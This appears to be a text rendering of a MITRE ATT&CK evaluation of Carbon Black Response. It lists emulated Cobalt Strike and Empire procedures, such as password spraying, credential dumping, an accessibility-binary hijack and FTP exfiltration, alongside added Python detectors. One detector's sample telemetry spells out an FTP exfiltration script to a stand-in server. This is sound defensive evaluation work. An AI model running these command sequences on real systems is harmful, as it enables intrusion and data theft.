ATT&CK Evaluations: Carbon Black Response

Carbon Black Response Summary Matrix: Page Information

The ATT&CK matrix summarizes the evaluation. Cells with dark text are the techniques in scope for the evaluation. Rolling over a technique in the interactive matrix shows how it was tested: the procedure name, the step of the operational flow, and the detection types associated with each procedure's detection(s).

Detection types are defined in the legend. Within the rollover, adjoining detection types make up a single detection, and whitespace separates different detections.

Example: the detection entry for the procedure WinRAR has two detections. The first is Telemetry with the Tainted modifier; the second is a Specific Behavior.

In the text version below the detection-type icons are not reproduced, so each table lists only the step and the procedure; a procedure with no detection shown here may still have had one recorded in the interactive matrix.


Legend

Main detection categories: None; Telemetry; Indicator of Compromise; General Behavior; Specific Behavior; Enrichment.

Detection modifiers: Tainted; Delayed; Configuration Change.
Matrix columns (tactics): Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control.

Not in scope: Drive-by Compromise, AppleScript, .bash_profile and .bashrc

Access Token Manipulation (Privilege Escalation; Defense Evasion)
Step   Procedure
3.A.1  Cobalt Strike: Built-in UAC bypass token duplication capability executed to modify current process token
5.B.1  Cobalt Strike: Built-in token theft capability executed to change user context to George
Not in scope: Account Manipulation

Account Discovery (Discovery)
Step    Procedure
2.G.1   Cobalt Strike: 'net user /domain' via cmd
2.G.2   Cobalt Strike: 'net user george /domain' via cmd
7.A.1   Microsoft Management Console (Local Users and Groups snap-in) GUI utility displayed user account information
12.G.1  Empire: 'net user' via PowerShell
12.G.2  Empire: 'net user /domain' via PowerShell
Not in scope: AppleScript, Audio Capture, Automated Exfiltration

Commonly Used Port (Command and Control)
Step    Procedure
1.C.1   Cobalt Strike: C2 channel established using port 53
6.B.1   Cobalt Strike: C2 channel modified to use port 80
11.B.1  Empire: C2 channel established using port 443
14.A.1  Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over port 8080
Not in scope: Exploit Public-Facing Application, CMSTP

Accessibility Features (Persistence; Privilege Escalation)
Step    Procedure
17.C.1  Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
20.A.1  magnify.exe, previously overwritten by cmd.exe, launched through RDP connection made to Creeper (10.0.0.4)
Not in scope: BITS Jobs, Bash History

Application Window Discovery (Discovery)
Step    Procedure
8.C.1   Cobalt Strike: Keylogging capability included residual enumeration of application windows
15.A.1  Empire: Built-in keylogging module included residual enumeration of application windows
Not in scope: Application Deployment Software, Automated Collection

Data Compressed (Exfiltration)
Step    Procedure
19.B.1  Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

Not in scope: Communication Through Removable Media
Not in scope: Hardware Additions

Command-Line Interface (Execution)
Step    Procedure
16.F.1  Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Not in scope: Account Manipulation, AppCert DLLs, Binary Padding

Brute Force (Credential Access)
Step    Procedure
16.A.1  Empire: 'net use' via PowerShell for password-spraying authentication attempts against Morris (10.0.1.4) and Nimda (10.0.1.6), targeting the credentials of users Kmitnick, Bob, and Frieda
16.B.1  Empire: Successful authentication to Conficker (10.0.0.5) using credentials of user Kmitnick as a result of the password spraying
Not in scope: Browser Bookmark Discovery, Distributed Component Object Model

Clipboard Data (Collection)
Step      Procedure
12.E.1.5  Empire: WinEnum module included enumeration of clipboard contents
Data Encrypted (Exfiltration)
Step    Procedure
19.B.1  Empire: Executed binary (recycler.exe) created encrypted archive (old.rar) of previously collected file

Not in scope: Connection Proxy
Not in scope: Replication Through Removable Media, Compiled HTML File, AppCert DLLs, AppInit DLLs

Bypass User Account Control (Defense Evasion; Privilege Escalation)
Step    Procedure
3.A.1   Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
14.A.1  Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level
Credential Dumping (Credential Access)
Step   Procedure
5.A.1  Cobalt Strike: Built-in Mimikatz credential dump capability executed
5.A.2  Cobalt Strike: Built-in hash dump capability executed
File and Directory Discovery (Discovery)
Step        Procedure
8.A.1       Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
8.A.2       Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
9.A.1       Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
12.E.1.4.1  Empire: WinEnum module included enumeration of recently opened files
12.E.1.4.2  Empire: WinEnum module included enumeration of interesting files
16.K.1      Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
18.A.1      Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
Not in scope: Exploitation of Remote Services

Data Staged (Collection)
Step    Procedure
18.B.1  Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Not in scope: Data Transfer Size Limits, Custom Command and Control Protocol
Not in scope: Spearphishing Attachment, Control Panel Items, AppInit DLLs, Application Shimming, CMSTP

Credentials in Files (Credential Access)
Step    Procedure
15.B.1  Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Not in scope: Network Service Scanning, Logon Scripts, Data from Information Repositories

Exfiltration Over Alternative Protocol (Exfiltration)
Step    Procedure
19.C.1  Empire: Sequence of 'echo' commands via PowerShell to write commands into a text file (ftp.txt), which was then executed by FTP to exfiltrate data over a network connection separate from the existing C2 channel
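Step 19.C.1 above is visible in command-line telemetry as a run of 'echo ... >> ftp.txt' commands followed by 'ftp -s:ftp.txt'. The following is an added example, not code from the evaluation page, from MITRE or from Carbon Black, of a detector that rebuilds the FTP script from those echo commands and reports the server and the files put to it. The host name, parent PID, server address (192.0.2.10, a documentation address), credentials and paths in the sample telemetry are constructed.

```python
"""Added example (not part of the ATT&CK Evaluations page, of MITRE's tooling or
of Carbon Black): reconstruct an FTP command script assembled with a run of
'echo ... >> file' commands and executed with 'ftp -s:file' (step 19.C.1) from
constructed command-line telemetry. Hosts, PIDs, the server address, credentials
and file names are assumptions."""
import re
from collections import defaultdict
from dataclasses import dataclass

@dataclass
class CmdEvent:
    host: str
    parent_pid: int   # process that spawned the command (the Empire agent's host process)
    cmdline: str

# 'echo <text> >> <file>' (or a single '>'), optionally preceded by a 'cmd /c' or
# 'powershell -c' wrapper in front of the echo.
ECHO_REDIRECT = re.compile(
    r"^(?:.*?(?:/c|-c|-command)\s+)?echo\s+(?P<text>.*?)\s*>>?\s*(?P<file>\S+)\s*$",
    re.IGNORECASE)
# 'ftp -s:<file>' (script mode), allowing other switches such as -n or -i before -s.
FTP_SCRIPT = re.compile(r"\bftp(?:\.exe)?\s+(?:-\w+\s+)*-s:(?P<file>\S+)", re.IGNORECASE)

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect_ftp_script_exfil(events):
    """One alert per 'ftp -s:' execution, carrying the script that echo commands
    from the same parent process wrote into that file, plus the server and the
    files uploaded with 'put'/'mput'."""
    scripts = defaultdict(list)          # (host, parent_pid, script file) -> lines
    alerts = []
    for ev in events:
        m = ECHO_REDIRECT.match(ev.cmdline)
        if m:
            key = (ev.host, ev.parent_pid, _basename(m.group("file")))
            if ">>" not in ev.cmdline:   # a single '>' truncates the file: start over
                scripts[key] = []
            scripts[key].append(m.group("text").strip())
            continue
        m = FTP_SCRIPT.search(ev.cmdline)
        if not m:
            continue
        key = (ev.host, ev.parent_pid, _basename(m.group("file")))
        lines = scripts.get(key, [])
        server = next((l.split(None, 1)[1] for l in lines if l.lower().startswith("open ")), None)
        uploads = [l.split(None, 1)[1] for l in lines if l.lower().startswith(("put ", "mput "))]
        alerts.append({"host": ev.host, "parent_pid": ev.parent_pid,
                       "script_file": m.group("file"), "server": server,
                       "uploads": uploads, "script": lines})
    return alerts

# Constructed telemetry modelled on step 19.C.1; 192.0.2.10 stands in for the attacker's FTP server.
SAMPLE_EVENTS = [
    CmdEvent("CODERED", 5120, r"C:\Windows\System32\cmd.exe /c echo open 192.0.2.10>>ftp.txt"),
    CmdEvent("CODERED", 5120, r"C:\Windows\System32\cmd.exe /c echo exfil>>ftp.txt"),
    CmdEvent("CODERED", 5120, r"C:\Windows\System32\cmd.exe /c echo Passw0rd>>ftp.txt"),
    CmdEvent("CODERED", 5120, r"C:\Windows\System32\cmd.exe /c echo binary>>ftp.txt"),
    CmdEvent("CODERED", 5120, r"C:\Windows\System32\cmd.exe /c echo put C:\$Recycle.Bin\old.rar>>ftp.txt"),
    CmdEvent("CODERED", 5120, r"C:\Windows\System32\cmd.exe /c echo quit>>ftp.txt"),
    CmdEvent("CODERED", 5120, r"C:\Windows\System32\cmd.exe /c ftp -s:ftp.txt"),
    # unrelated echo redirection from a different parent: no ftp follows, so no alert
    CmdEvent("MORRIS", 772, r"C:\Windows\System32\cmd.exe /c echo done > C:\temp\status.log"),
]

if __name__ == "__main__":
    for a in detect_ftp_script_exfil(SAMPLE_EVENTS):
        print(f"{a['host']} pid {a['parent_pid']}: ftp script to {a['server']} uploads {a['uploads']}")
```

Keying the buffer on (host, parent process, script file) is what separates the staged script from ordinary echo redirections elsewhere on the host; matching on the ftp execution alone would still fire, but without the server and file names that make the alert actionable.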
Not in scope: Custom Cryptographic Protocol, Spearphishing Link, Dynamic Data Exchange, Application Shimming

Bypass User Account Control (Privilege Escalation): same procedures as listed under Defense Evasion above (3.A.1, 14.A.1)
Not in scope: Clear Command History, Credentials in Registry

Network Share Discovery (Discovery)
Step        Procedure
12.E.1.9.1  Empire: WinEnum module included enumeration of available shares
12.E.1.9.2  Empire: WinEnum module included enumeration of mapped network drives
Not in scope: Pass the Hash, Data from Local System

Exfiltration Over Command and Control Channel (Exfiltration)
Step   Procedure
9.B.1  Cobalt Strike: Download capability exfiltrated data through existing C2 channel

Data Encoding (Command and Control)
Step   Procedure
1.C.1  Cobalt Strike: C2 channel established using both NetBIOS and base64 encoding
Not in scope: Spearphishing via Service, Execution through API (enabling technique, not directly tested), Authentication Package, DLL Search Order Hijacking, Code Signing, Exploitation for Credential Access, Network Sniffing, Pass the Ticket

Data from Network Shared Drive (Collection)
Step    Procedure
9.B.1   Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
18.B.1  Empire: 'copy' via PowerShell collected a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Not in scope: Exfiltration Over Other Network Medium, Data Obfuscation
Not in scope: Supply Chain Compromise, Execution through Module Load, BITS Jobs, Dylib Hijacking, Compiled HTML File, Forced Authentication

Password Policy Discovery (Discovery)
Step      Procedure
12.E.1.3  Empire: WinEnum module included enumeration of password policy information
Remote Desktop Protocol (Lateral Movement)
Step    Procedure
6.C.1   Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
10.B.1  RDP connection made to Conficker (10.0.0.5) as part of execution of persistence mechanism
20.A.1  RDP connection made to Creeper (10.0.0.4) as part of execution of persistence mechanism

Not in scope: Data from Removable Media, Exfiltration Over Physical Medium, Domain Fronting
Not in scope: Trusted Relationship, Exploitation for Client Execution, Bootkit, Exploitation for Privilege Escalation, Component Firmware, Hooking, Peripheral Device Discovery

Remote File Copy (Lateral Movement; Command and Control)
Step    Procedure
7.B.1   Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
14.A.1  Empire: UAC bypass module downloaded and wrote a new Empire stager (wdbypass) to disk
16.E.1  Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
16.G.1  Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
19.A.1  Empire: Built-in upload module executed to write binary (recycler.exe) to disk on CodeRed (10.0.1.5)

Not in scope: Email Collection, Scheduled Transfer, Fallback Channels
Not in scope: Valid Accounts (Initial Access)

Graphical User Interface (Execution)
Step   Procedure
7.A.1  Microsoft Management Console (Local Users and Groups snap-in) GUI utility used to add new user through RDP connection
Not in scope: Browser Extensions, Extra Window Memory Injection, Component Object Model Hijacking

Input Capture (Credential Access; Collection)
Step    Procedure
8.C.1   Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
15.A.1  Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Permission Groups Discovery (Discovery)
Step      Procedure
2.F.1     Cobalt Strike: 'net localgroup administrators' via cmd
2.F.2     Cobalt Strike: 'net localgroup administrators /domain' via cmd
2.F.3     Cobalt Strike: 'net group "Domain Admins" /domain' via cmd
12.E.1.2  Empire: WinEnum module included enumeration of AD group memberships
12.F.1    Empire: 'net group "Domain Admins" /domain' via PowerShell
12.F.2    Empire: 'net localgroup administrators' via PowerShell
Not in scope: Remote Services

Input Capture (Collection): same procedures as listed under Credential Access above (8.C.1, 15.A.1)

Not in scope: Multi-Stage Channels
Not in scope: InstallUtil, Change Default File Association, File System Permissions Weakness, Control Panel Items, Input Prompt

Process Discovery (Discovery)
Step    Procedure
2.C.1   Cobalt Strike: 'ps' (Process status) via Win32 APIs
2.C.2   Cobalt Strike: 'tasklist /v' via cmd
3.B.1   Cobalt Strike: 'ps' (Process status) via Win32 APIs
8.B.1   Cobalt Strike: 'ps' (Process status) via Win32 APIs
12.C.1  Empire: 'qprocess *' via PowerShell

Not in scope: Replication Through Removable Media, Man in the Browser, Multi-hop Proxy
Not in scope: LSASS Driver, Component Firmware, Hooking, DCShadow, Kerberoasting

Query Registry (Discovery)
Step      Procedure
2.H.1     Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
6.A.1     Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
12.E.1.7  Empire: WinEnum module included enumeration of system information via a Registry query
13.C.1    Empire: 'reg query' via PowerShell to enumerate a specific Registry key
17.A.1    Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Not in scope: SSH Hijacking

Screen Capture (Collection)
Step   Procedure
8.D.1  Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Multiband Communication (Command and Control)
Step   Procedure
6.B.1  Cobalt Strike: C2 channel modified to split communications between both HTTP and DNS
Not in scope: Launchctl, Component Object Model Hijacking, Image File Execution Options Injection, DLL Search Order Hijacking, Keychain

Remote System Discovery (Discovery)
Step    Procedure
4.A.1   Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd
4.A.2   Cobalt Strike: 'net group "Domain Computers" /domain' via cmd
13.A.1  Empire: 'net group "Domain Computers" /domain' via PowerShell
Not in scope: Shared Webroot, Video Capture, Multilayer Encryption, Local Job Scheduling

Create Account (Persistence)
Step   Procedure
7.A.1  Added user Jesse to Conficker (10.0.0.5) through RDP connection
Not in scope: Launch Daemon, DLL Side-Loading, LLMNR/NBT-NS Poisoning

Security Software Discovery (Discovery)
Step         Procedure
12.E.1.10.1  Empire: WinEnum module included enumeration of AV solutions
12.E.1.10.2  Empire: WinEnum module included enumeration of firewall rules

Not in scope: Taint Shared Content, Port Knocking
Not in scope: Mshta, DLL Search Order Hijacking

New Service (Privilege Escalation; Persistence)
Step    Procedure
16.I.1  Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
Not in scope: Deobfuscate/Decode Files or Information, Network Sniffing

System Information Discovery (Discovery)
Step        Procedure
2.E.1       Cobalt Strike: 'systeminfo' via cmd
2.E.2       Cobalt Strike: 'net config workstation' via cmd
12.E.1.6.1  Empire: WinEnum module included enumeration of system information
12.E.1.6.2  Empire: WinEnum module included enumeration of Windows update information

Not in scope: Third-party Software, Remote Access Tools
Not in scope: PowerShell (enabling technique, not directly tested), Dylib Hijacking, Path Interception, Disabling Security Tools, Password Filter DLL

System Network Configuration Discovery (Discovery)
Step       Procedure
2.A.1      Cobalt Strike: 'ipconfig /all' via cmd
2.A.2      Cobalt Strike: 'arp -a' via cmd
4.B.1      Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
12.A.1     Empire: 'route print' via PowerShell
12.A.2     Empire: 'ipconfig /all' via PowerShell
12.E.1.11  Empire: WinEnum module included enumeration of network adapters
Windows Admin Shares (Lateral Movement)
Step    Procedure
16.A.1  Empire: Brute force password spraying attempts targeted Windows admin shares on Morris (10.0.1.4) and Nimda (10.0.1.6)
16.B.1  Empire: Successful authentication targeted Windows admin share on Conficker (10.0.0.5)
16.D.1  Empire: Successful authentication targeted Windows admin shares on Creeper (10.0.0.4)
Remote File Copy (Command and Control): same procedures as listed under Lateral Movement above (7.B.1, 14.A.1, 16.E.1, 16.G.1, 19.A.1)
Not in scope: Regsvcs/Regasm, External Remote Services, Plist Modification, Exploitation for Defense Evasion, Private Keys

System Network Connections Discovery (Discovery)
Step       Procedure
4.C.1      Cobalt Strike: 'netstat -ano' via cmd
12.E.1.12  Empire: WinEnum module included enumeration of established network connections
13.B.1     Empire: 'net use' via PowerShell
13.B.2     Empire: 'netstat -ano' via PowerShell
Not in scope: Windows Remote Management

Standard Application Layer Protocol (Command and Control)
Step    Procedure
1.C.1   Cobalt Strike: C2 channel established using DNS traffic to freegoogleadsenseinfo.com
6.B.1   Cobalt Strike: C2 channel modified to use HTTP traffic to freegoogleadsenseinfo.com
11.B.1  Empire: C2 channel established using HTTPS traffic to freegoogleadsenseinfo.com
14.A.1  Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over HTTP
Not in scope: Regsvr32, File System Permissions Weakness, Port Monitors, Extra Window Memory Injection, Securityd Memory

System Owner/User Discovery (Discovery)
Step      Procedure
2.B.1     Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
12.B.1    Empire: 'whoami /all /fo list' via PowerShell
12.E.1.1  Empire: WinEnum module included enumeration of user information
20.B.1    'whoami' executed via the cmd persistence mechanism through the RDP connection made to Creeper (10.0.0.4)
Standard Cryptographic Protocol (Command and Control)
Step    Procedure
11.B.1  Empire: Encrypted C2 channel established using HTTPS
Rundll32 (Execution; Defense Evasion)
Step   Procedure
1.A.1  Previously executed batch file (pdfhelper.cmd) launched a DLL payload (update.dat) using Rundll32
Not in scope: Hidden Files and Directories

Process Injection (Privilege Escalation; Defense Evasion)
Step   Procedure
3.C.1  Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
5.A.1  Cobalt Strike: Credential dump capability involved process injection into lsass.exe
5.A.2  Cobalt Strike: Hash dump capability involved process injection into lsass.exe
8.D.1  Cobalt Strike: Screen capture capability involved process injection into explorer.exe
File Deletion (Defense Evasion)
Step    Procedure
19.D.1  Empire: 'del C:\"$"Recycle.bin\old.rar'
19.D.2  Empire: 'del recycler.exe'
Not in scope: Two-Factor Authentication Interception

System Service Discovery (Discovery)
Step      Procedure
2.D.1     Cobalt Strike: 'sc query' via cmd
2.D.2     Cobalt Strike: 'net start' via cmd
12.D.1    Empire: 'net start' via PowerShell
12.E.1.8  Empire: WinEnum module included enumeration of services
16.H.1    Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
16.J.1    Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
17.A.1    Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
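The discovery procedures in this section and in the Account Discovery, Permission Groups Discovery, Process Discovery, Query Registry, Remote System Discovery, System Information Discovery, System Network Configuration Discovery and System Network Connections Discovery sections above are each a single, individually benign command; what distinguishes steps 2.A through 2.H and 4.A through 4.C is that one parent process runs many of them in a few minutes. The following added example, not code from the evaluation page, from MITRE or from Carbon Black, maps command lines to the technique the page assigns them and alerts when one parent process covers several distinct discovery techniques inside a time window. The host names, PIDs, timestamps and the registry key in the sample telemetry are constructed.

```python
"""Added example (not part of the ATT&CK Evaluations page, of MITRE's tooling or
of Carbon Black): score bursts of host and domain enumeration commands per
parent process. The command-to-technique table follows steps 2.A-2.H, 4.A-4.C,
12.A-12.G and 13.A-13.B of the page; hosts, PIDs, timestamps and the registry
key in the sample are constructed."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Regexes run against the normalised command line; first match wins, so the more
# specific 'net group "Domain Computers"' rule sits above the generic 'net group'.
DISCOVERY_PATTERNS = [
    (r"^net1?\s+group\s+domain (computers|controllers)\b", "Remote System Discovery"),
    (r"^net1?\s+(group|localgroup)\b", "Permission Groups Discovery"),
    (r"^net1?\s+user\b", "Account Discovery"),
    (r"^(net1?\s+start\b|sc\s+(query|qc)\b)", "System Service Discovery"),
    (r"^(systeminfo\b|net1?\s+config\s+workstation)", "System Information Discovery"),
    (r"^(ipconfig\b|arp\s+-a|route\s+print|netsh\s+advfirewall\s+show)", "System Network Configuration Discovery"),
    (r"^(netstat\b|net1?\s+use\s*$)", "System Network Connections Discovery"),
    (r"^(tasklist\b|qprocess\b)", "Process Discovery"),
    (r"^reg\s+query\b", "Query Registry"),
    (r"^(dir|tree)\b", "File and Directory Discovery"),
    (r"^whoami\b", "System Owner/User Discovery"),
]

@dataclass
class CmdEvent:
    ts: str           # ISO-8601 timestamp
    host: str
    parent_pid: int   # process that spawned the command (the beacon or stager)
    cmdline: str

def normalize(cmdline: str) -> str:
    """Strip quotes, a leading image path, a 'cmd /c' wrapper and a '.exe' suffix
    so that 'C:\\Windows\\System32\\cmd.exe /c net user' becomes 'net user'."""
    c = cmdline.replace('"', "").strip()
    c = re.sub(r"^[A-Za-z]:\\[^ ]*\\", "", c)
    c = re.sub(r"^cmd(\.exe)?\s+/c\s+", "", c, flags=re.IGNORECASE)
    c = re.sub(r"^[A-Za-z]:\\[^ ]*\\", "", c)
    parts = c.split(None, 1)
    if parts and parts[0].lower().endswith(".exe"):
        parts[0] = parts[0][:-4]
    return " ".join(parts).lower()

def tag(cmdline: str):
    """ATT&CK discovery technique for one command line, or None if it is not one."""
    c = normalize(cmdline)
    for pattern, technique in DISCOVERY_PATTERNS:
        if re.search(pattern, c):
            return technique
    return None

def burst_alerts(events, window=timedelta(minutes=10), min_techniques=3):
    """Map (host, parent_pid) -> sorted technique names for every parent whose
    commands cover at least min_techniques distinct techniques within one window."""
    by_parent = defaultdict(list)
    for ev in events:
        technique = tag(ev.cmdline)
        if technique:
            by_parent[(ev.host, ev.parent_pid)].append((datetime.fromisoformat(ev.ts), technique))
    alerts = {}
    for key, items in by_parent.items():
        items.sort()
        best, start = set(), 0
        for end in range(len(items)):        # sliding window over time-ordered commands
            while items[end][0] - items[start][0] > window:
                start += 1
            techniques = {t for _, t in items[start:end + 1]}
            if len(techniques) > len(best):
                best = techniques
        if len(best) >= min_techniques:
            alerts[key] = sorted(best)
    return alerts

# Constructed telemetry: the step 2/4 Cobalt Strike recon on Nimda, plus one admin command on Morris.
SAMPLE_EVENTS = [
    CmdEvent("2018-10-09T14:02:10", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c ipconfig /all"),
    CmdEvent("2018-10-09T14:02:14", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c arp -a"),
    CmdEvent("2018-10-09T14:02:40", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c tasklist /v"),
    CmdEvent("2018-10-09T14:03:05", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c sc query"),
    CmdEvent("2018-10-09T14:03:09", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c net start"),
    CmdEvent("2018-10-09T14:03:30", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c systeminfo"),
    CmdEvent("2018-10-09T14:03:44", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c net config workstation"),
    CmdEvent("2018-10-09T14:04:01", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c net localgroup administrators"),
    CmdEvent("2018-10-09T14:04:20", "NIMDA", 4321, r'C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain'),
    CmdEvent("2018-10-09T14:04:50", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c net user /domain"),
    CmdEvent("2018-10-09T14:05:12", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c reg query HKLM\SOFTWARE\Example"),
    CmdEvent("2018-10-09T14:07:30", "NIMDA", 4321, r'C:\Windows\System32\cmd.exe /c net group "Domain Controllers" /domain'),
    CmdEvent("2018-10-09T14:07:55", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c netsh advfirewall show allprofiles"),
    CmdEvent("2018-10-09T14:08:10", "NIMDA", 4321, r"C:\Windows\System32\cmd.exe /c netstat -ano"),
    CmdEvent("2018-10-09T14:06:00", "MORRIS", 880, r"C:\Windows\System32\ipconfig.exe /all"),
    CmdEvent("2018-10-09T14:06:30", "MORRIS", 880, r"C:\Windows\System32\PING.EXE 10.0.0.5"),
]

if __name__ == "__main__":
    for (host, pid), techniques in burst_alerts(SAMPLE_EVENTS).items():
        print(f"{host} parent pid {pid}: {len(techniques)} discovery techniques: {', '.join(techniques)}")
```

Counting distinct techniques rather than commands keeps a help-desk session that runs ipconfig twice below the threshold, while the beacon on Nimda covers nine techniques in six minutes. The WinEnum procedures (12.E.1.x) do not appear on the command line at all, which is why a detector like this has to be paired with script-block or API-level telemetry.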
Not in scope: Standard Non-Application Layer Protocol

Scheduled Task (Execution; Privilege Escalation; Persistence)
Step    Procedure
7.C.1   Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
10.A.2  Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Not in scope: Hooking, SID-History Injection

File Permissions Modification (Defense Evasion)
Step    Procedure
17.B.1  Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
17.B.2  Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
Not in scope: System Time Discovery, Uncommonly Used Port

Scripting (Execution; Defense Evasion)
Step    Procedure
1.A.1   Previously executed self-extracting archive (Resume Viewer.exe) launched an embedded batch file (pdfhelper.cmd)
11.A.1  Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
12.E.1  Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Not in scope: Hypervisor

Scheduled Task (Privilege Escalation): same procedures as listed under Execution above (7.C.1, 10.A.2)
Not in scope: File System Logical Offsets, Web Service

Service Execution (Execution)
Step    Procedure
16.L.1  Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Not in scope: Image File Execution Options Injection, Service Registry Permissions Weakness, Gatekeeper Bypass, Signed Binary Proxy Execution, Kernel Modules and Extensions, Setuid and Setgid, HISTCONTROL, Signed Script Proxy Execution, LC_LOAD_DYLIB Addition, Startup Items, Hidden Files and Directories, Source, LSASS Driver, Sudo Caching, Hidden Users, Space after Filename, Launch Agent, Sudo, Hidden Window, Third-party Software, Launch Daemon

Valid Accounts (Privilege Escalation; Persistence; Defense Evasion)
Step    Procedure
10.B.1  RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
16.B.1  Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
16.D.1  Empire: 'net use' via PowerShell to successfully authenticate to Creeper (10.0.0.4) using credentials of user Kmitnick
Not in scope: Image File Execution Options Injection, Trap, Launchctl, Web Shell, Indicator Blocking, Trusted Developer Utilities, Local Job Scheduling, Indicator Removal from Tools
User Execution (Execution)
Step   Procedure
1.A.1  Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
Not in scope: Login Item, Indicator Removal on Host, Windows Management Instrumentation, Logon Scripts, Indirect Command Execution, Windows Remote Management, Modify Existing Service, Install Root Certificate, XSL Script Processing, Netsh Helper DLL, InstallUtil
New Service (Persistence): same procedure as listed under Privilege Escalation above (16.I.1)
Not in scope: LC_MAIN Hijacking, Office Application Startup, Launchctl
Not in scope: Path Interception

Masquerading (Defense Evasion)
Step    Procedure
16.I.1  Empire: 'sc description' via PowerShell to remotely disguise a service on Creeper (10.0.0.4)
19.A.1  Empire: File dropped to disk is a renamed copy of the WinRAR binary
19.B.1  Empire: Executed binary (recycler.exe) is a renamed copy of the WinRAR binary
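The renamed WinRAR of 19.A.1/19.B.1 and the accessibility-feature hijack of 17.B.1, 17.B.2, 17.C.1 and 20.A.1 (File Permissions Modification and Accessibility Features above) are both cases where the name of the running image disagrees with what the file actually is. The following added example, not code from the evaluation page, from MITRE or from Carbon Black, classifies process-creation records shaped like Sysmon Event ID 1 fields: it flags takeown/icacls and copy commands that name an accessibility binary, an accessibility binary whose PE OriginalFileName is not its own name, a shell spawned by one, and any other image whose OriginalFileName does not match. The hosts, paths, parent images, the icacls and WinRAR arguments and the OriginalFileName values in the sample are constructed.

```python
"""Added example (not part of the ATT&CK Evaluations page, of MITRE's tooling or
of Carbon Black): flag the accessibility-feature hijack chain of steps 17.B.1,
17.B.2, 17.C.1 and 20.A.1 and the renamed-binary masquerading of steps
19.A.1/19.B.1 from constructed process-creation records with Sysmon-style
fields. Hosts, paths, command-line arguments and OriginalFileName values are
assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Binaries winlogon.exe launches from the logon screen; the classic hijack targets.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                          "narrator.exe", "displayswitch.exe", "atbroker.exe"}
PERMISSION_TOOLS = {"takeown.exe", "icacls.exe", "cacls.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
COPY_VERBS = re.compile(r"\b(copy|move|xcopy|robocopy|cp|mv|copy-item|move-item)\b", re.IGNORECASE)

@dataclass
class ProcEvent:
    host: str
    image: str               # full path of the created process
    cmdline: str
    parent_image: str
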